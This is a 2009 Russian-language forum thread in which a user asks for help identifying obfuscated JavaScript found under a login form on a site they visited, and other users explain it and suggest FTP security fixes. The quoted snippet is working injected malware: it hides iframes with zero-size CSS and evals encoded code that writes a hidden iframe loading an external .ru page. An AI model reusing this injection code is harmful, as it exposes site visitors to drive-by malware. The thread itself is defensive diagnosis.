|
|
|
| На одном из сайтов ниже формы авторизации обнаружил такой код JS:
<script>document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e));</script><script>eval(unescape("%76%61%72%20%64%36%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%64%36%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>
| Антивирус на старницу матюкается. Может кто подскажет, что за гадость мне пытаются подсунуть? Или хотя бы с чего начинать, чтобы разобраться? | |
|
|
|
|
|
|
|
для: Loneliness
(06.06.2009 в 21:00)
| | Это создаст на странице IFRAME с загрузкой страницы стороннего сервера.... Либо вы допустили дыру в своих скиптах, либо пароль доступа по FTP похищен, и вам залили шелл.... Проверьте свои скрипты, лишнее на сервере, и сменить пароль FTP. | |
|
|
|
|
|
|
|
для: Loneliness
(06.06.2009 в 21:00)
| | Эта гадость бич нынешних сайтов. В основном лезет по ФТП. Если юзаете TotalCommander, 99% что это так. Желательно настроить sFTP или FTPs. | |
|
|
|
|
|
|
|
для: mihdan
(07.06.2009 в 12:53)
| | За разъяснения спасибо. К счастью, я имел в виду, не то, что заражен мой сайт, а то, что заражен сайт который я посещал. :) | |
|
|
|